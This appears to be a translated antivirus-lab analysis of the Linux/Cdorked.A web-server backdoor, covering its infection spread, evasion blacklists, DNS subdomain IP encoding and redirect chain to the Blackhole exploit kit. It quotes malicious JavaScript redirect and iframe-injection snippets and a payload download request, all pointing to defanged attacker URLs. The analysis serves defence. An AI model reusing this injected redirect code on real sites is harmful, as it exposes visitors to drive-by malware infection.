Linux / Cdorked.A: Web servers running Lighttpd and nginx are at risk

    In the last part of our study, we promised to publish a continuation of the analysis of the Linux server infection incident involving the Linux / Cdorked.A backdoor . We already wrote that the specialists of our laboratory installed its main task, which is to redirect web server users to malicious websites. Investigating this incident in more detail, we came to the following conclusions:

    • In total, more than 400 web servers infected with Linux / Cdorked.A were detected. In addition, 50 of them host websites that are included in Alexa's TOP 100,000 most popular websites.
    • The backdoor compromised web servers not only running Apache, but also Lighttpd, as well as nginx.
    • According to our telemetry systems, this threat has been active since December 2012.
    • The backdoor uses additional mechanisms to ensure its secrecy. In particular, we found that malicious code will not redirect users if the client's IP address is in the range of addresses indicated in the black list. This blacklist is quite large and includes addresses belonging to countries such as Japan, Finland, Russia, Ukraine, Kazakhstan and Belarus. In addition, a country check is also performed by analyzing the HTTP header and the Accept-Language parameter.
    • Our cloud technology shows nearly 100,000 users of ESET AV products that are redirected to links generated by compromised web servers. At the same time, such redirection to malicious content was blocked by the antivirus.
    • In some cases, we observed special redirects for the Apple iPad and iPhone platforms.




    In this post we want to dwell in more detail on the capabilities of this backdoor that were identified during the analysis, as well as describe in more detail the malicious content delivered to users and the organization of redirecting the user to a set of exploits.

    It should be noted that we do not know for sure how the backdoor got to the servers. Perhaps the vector of this attack was not unique. At the same time, we cannot say that a cPanel configuration gap was used to install it, since not all compromised servers were under its control. The backdoor does not have self-distribution mechanisms and does not use the vulnerability in software on the server for its installation.

    The following screenshots show the places in the backdoor code where the remote access to the server is opened. Various types of binary files replacing legal Lighttpd, nginx and Apache files.


    Lighttpd


    nginx


    Apache

    The backdoor code looks identical in all three cases, but the hooks used inside some functions are different because they depend on the selected server and its data structures.

    Backdoor features

    We have already mentioned the commands supported by the backdoor. In this analysis, we will dwell on them in more detail.



    These lists are stored in a shared memory area that can be accessed using our analysis tool. The settings listed in the table really give attackers an excellent opportunity to fine-tune their malicious code when choosing targets for an attack. Linux / Cdorked.A maintains a list of IP addresses of already redirected clients, indicating the redirection time. This avoids re-redirecting for a specified period of time. None of these settings are stored in a file on disk and each of them is modified through special HTTP requests processed by the backdoor.

    Typical backdoor configuration

    With the help of system administrators who participated in the investigation of incidents of compromise of the web server, as well as company specialistsSucuri we were able to get dumps of memory regions in which Linux / Cdorked.A stores its configuration information. An example of one of these dumps:



    So far, we have not been able to get any Linux / Cdorked.A configurations that contain more than one URL used to redirect clients. The specified redirect applies to clients who make requests to the server, working under the browsers Internet Explorer or Firefox on Windows XP, Vista, Seven. Users of the Apple iPhone and iPad were also on target, however, instead of redirecting to a set of exploits, they used the tactic of redirecting to a web page with links to pornographic websites. The following screenshot demonstrates a redirect on an iPhone.



    We have already mentioned that the Linux / Cdorked.A configuration includes an extensive IP address range blacklist. Visitors to a compromised web server from one of these addresses will never be redirected to malicious content. In fact, in the backdoor configurations that we observed, the number of IP addresses, which represents 50% of all possible IP v4 space addresses, was blocked. The client is also not redirected if the language set in the Accept-Language field of the browser’s HTTP header is blacklisted. The list includes languages:

    • ja, jp - Japanese;
    • fi is Finnish;
    • ru - Russian;
    • uk - Ukrainian;
    • be - Belarusian;
    • kk - Kazakh;

    In fact, the cybercriminals deliberately limited the geography of the backdoor, since uncontrolled infection of users could adversely affect the maintenance of already compromised servers and the imposition of unnecessary suspicions.

    Redirect statistics

    In fact, these malicious redirects have something in common: in the case of Blackhole, when redirecting clients, the “/ info / last” part in the URL pattern is indicated. In the earliest traces of malicious activity that we tracked, it uses the template in which the “/ info / last” part is indicated, using identical DNS templates, which will be described later.

    After analyzing the traffic, we discovered more than 400 web servers that were affected by the activities of Linux / Cdorked.A. At the same time, 50 of them provide hosting for websites that are included in Alexa TOP 100,000 of the most popular websites. After the publication of the first part of our analysis, some owners of these servers cleaned the servers from this threat.



    Linux / Cdorked.A supports the timestamps of the last redirection case for each IP address. We were able to extract this information from a memory dump in order to estimate how many redirects a single server can do during a day. One of these dumps contained information about the server, which carried out more than 28,000 redirects in 24 hours. Such servers are not active all the time, the redirection statistics for several servers are shown below.





    DNS hijacking

    The URLs used by the backdoor for redirects often change. However, there are several patterns:

    • Usually the path to the domain is: [numbers, a, b or c] [characters]. [Tld].
    • The next level domain is always 16 hex characters long.

    The specific format of the subdomains and the fact that they are constantly changing gives us reason to believe that some DNS servers have been compromised. We conducted several tests in which we ourselves modified the characters of subdomains and in some cases received a change in the IP address during its translation. With some other tests, we were able to confirm the fact that the IP address returned through the DNS service is actually encoded in the name of the subdomain itself. For this, characters in odd positions are used, which form a 4-byte hex string, which is then used to obtain an IP address. The XOR algorithm is used to generate an IP address:



    An algorithm is used for this. Redirection chain

    byte[] = { 16, 70, 183, 11 } // From the hex string
    seed = 49 // This seed changes, we have not yet found where it comes for
    ip[0] = seed ^ byte[0] // 33
    ip[1] = byte[0] ^ byte[1] // 86
    ip[2] = byte[1] ^ byte[2] // 241
    ip[3] = byte[2] ^ byte[3] // 188
    // This gives us a response with IP 188.241.86.33




    If the client is redirected to malicious content, it passes through several special web pages before being directly on the Blackhole exploit suite page. The following screenshot shows an example of such a chain.



    The first page /index.php contains a parameter that is encrypted using base64 and was documented in our previous article. After decoding, it looks as follows.

    ljroujxv = isiuzv & time = 1305022208-2007115935 & src = 141 & surl = somedomain.com & sport = 80 & key = ED143377 & suri = / tr / zeki.htm.

    This page contains JavaScript that redirects the user to the next page.

    var iflag = "0"; if (top!=self) { iflag = "1"; };
    var b64str = "MTQxNDExMzA1MDIyMjQ4M...luLmNvbS9zb3J0LnBocA==";
    setTimeout ( function() { location.replace( "hxxp://ae334b05c4249f38" + iflag
    + b64dec(b64str) ); }, 280);


    The URL from the second page consists of three parts: the initial subdomain, the value of the iflag parameter, and the value of the b64str variable generated by the server. Iflag is set to 1 if the current document is in the foreground of the browser window. In this case, the server will most likely reject the request. The value of the b64str variable is provided by the server and contains a URL with a very long part of the subdomain.

    1414113050222483098587bcf02fc1731aade45f74550b.somedomain.com/sort.php

    The third part of the URL contains specific information about this redirect, such as the source ID - src id, obtained from the start URL and the timestamp - timestamp. The purpose of the remaining characters remains unknown.



    The third page, sort.php, after a certain timeout directs the user to the fourth page, exit.php. A typical sort.php page is as follows. This fourth page shows pornographic images and provides links to pornographic websites. The page also contains an iframe that leads to the Blackhole page. It is not yet clear whether links to porn content are malicious or are part of an affiliate program. Below is an iframe leading to the landing page of Blackhole. <br> The last step is to download malware onto the victim’s computer if one of the exploits succeeds. GET /get3.php?e=176541242&tc=1305022250-072800c977&uid=536201305032119591656771 HTTP / 1.0 Host: ae334b05c4249f38.somedomain.

    function gotime() { xflag=false; top.location.replace(b64dec("aHR0cDovL2FlMzM0YjA1YzQyNDlmM...
    ...cD94PTEzNyZ0PXRpbWVvdXQ=")); };
    var timer=setTimeout("gotime()", 21000);
    var ewq;
    ewq=document.createElement("span");
    ewq.innerHTML=b64dec("PGlmcmFtZSBzcmM9Im...1lPjxicj4=");
    setTimeout(function() { document.body.insertBefore(ewq,document.body.lastChild); }, 504);
    aHr...XQ= : hxxp://ae334b05c4249f38014141130...
    ...50222483098587bcf02fc1731aade45f74550b.somedomain.com/exit.php?x=137&t=timeout




    PGI...j4= : <iframe src="hxxp://ae334b05c4249f38014141130502224830...
    ...98587bcf02fc1731aade45f74550b.somedomain.com/info/last/index.php"
    width="120" height="21" marginwidth="0" marginheight="0" frameborder="0"
    scrolling="no" allowtransparency="true">






    User-Agent: NSISDL / 1.2 (Mozilla)
    Accept: * / *


    Our tests and telemetry data show that the Win32 / Glupteba.G Trojan was installed on users' computers .

    Recovery

    In a previous post, we already recommended that system administrators verify the integrity of the main binary files stored on the server. We also published the dump_cdorked_config tool to dump the memory region that stores the Linux / Cdorked.A configuration. This tool has been updated to detect all backdoor options, including versions for nginx and Lighttpd.

    For network users, we recommend updating the browser, its extensions, OS, and such critical software as Java, Adobe Reader, and Flash Player in a timely manner. Using antivirus software is also good practice.

    Also popular now: